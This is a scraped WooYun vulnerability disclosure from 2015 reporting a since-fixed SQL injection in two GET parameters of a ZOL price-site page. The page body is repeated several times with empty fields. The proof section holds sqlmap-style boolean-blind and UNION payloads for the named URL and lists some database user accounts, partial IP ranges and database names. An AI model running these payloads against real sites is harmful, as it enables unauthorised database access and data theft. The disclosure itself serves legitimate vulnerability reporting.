中关村在线某站SQL注射 | wooyun-2015-099391| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-099391

漏洞标题：中关村在线某站SQL注射

漏洞作者：紫霞仙子

提交时间：2015-03-04 10:39

修复时间：2015-03-05 14:34

公开时间：2015-03-05 14:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-04：细节已通知厂商并且等待厂商处理中
2015-03-04：厂商已经确认，细节仅向厂商公开
2015-03-05：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

233

详细说明：

半夜2点多搞出来的，太累了，早上起来发！

http://price.zol.com.cn/article/new/key_book_list.php?keyword_id=2677&subclass_id=232
用and 1=1测试，根据返回结果测试，发现参数keyword_id和subclass_id存在盲注、

漏洞证明：

---
Parameter: keyword_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword_id=2677) AND 8694=8694 AND (5688=5688&subclass_id=232
    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: keyword_id=2677) UNION ALL SELECT NULL,NULL,CONCAT(0x716a787171,0x78684944636b574b5461,0x7178717071),NULL,NULL#&subclass_id=232
Parameter: subclass_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyword_id=2677&subclass_id=232 AND 7392=7392
    Type: UNION query
    Title: MySQL UNION query (NULL) - 5 columns
    Payload: keyword_id=2677&subclass_id=232 UNION ALL SELECT NULL,NULL,CONCAT(0x716a787171,0x46417764545157754747,0x7178717071),NULL,NULL#
---
back-end DBMS: MySQL 5
database management system users [225]:
[*] '2u_bbs'@'10.*.18%'
[*] '2u_bbs'@'118.*.120.%'
[*] '2u_bbs_dongman'@'10.*.18%'
就贴3个，怕别人收集信息，以后渗透你们网段
。。。。。。
话说，怎么二百多个数据库用户！！！！
available databases [10]:
[*] all_site_info
[*] article_hits
[*] article_log
[*] article_new
[*] article_tools
[*] information_schema
[*] mysql
[*] school
[*] test
[*] web_url

修复方案：

快元宵节了求rank大礼包！！！

版权声明：转载请注明来源紫霞仙子@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-03-04 13:04

厂商回复：

在您提之前已经修复该漏洞，辛苦您，乌云有你更精彩~~

漏洞评价：

2015-03-04 11:19 | 明月影 ( 路人 | Rank:12 漏洞数:6 | 学姿势，学思路。)

昨晚上大致找了一下，很多链接不复存在，都在维修。果断放弃了。今天早上你就给人家爆出来了
2015-03-04 11:32 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:98 | 天天向上！！！)

@明月影额。。。。是同一个站么？
2015-03-04 13:35 | 明月影 ( 路人 | Rank:12 漏洞数:6 | 学姿势，学思路。)

同一家公司。应该不是同一个站。你听给力的

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-099391

漏洞标题：中关村在线某站SQL注射

相关厂商：中关村在线

漏洞作者：紫霞仙子

提交时间：2015-03-04 10:39

修复时间：2015-03-05 14:34

公开时间：2015-03-05 14:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源紫霞仙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-099391

漏洞标题：中关村在线某站SQL注射

相关厂商：中关村在线

漏洞作者： 紫霞仙子

提交时间：2015-03-04 10:39

修复时间：2015-03-05 14:34

公开时间：2015-03-05 14:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-099391"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：紫霞仙子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源紫霞仙子@乌云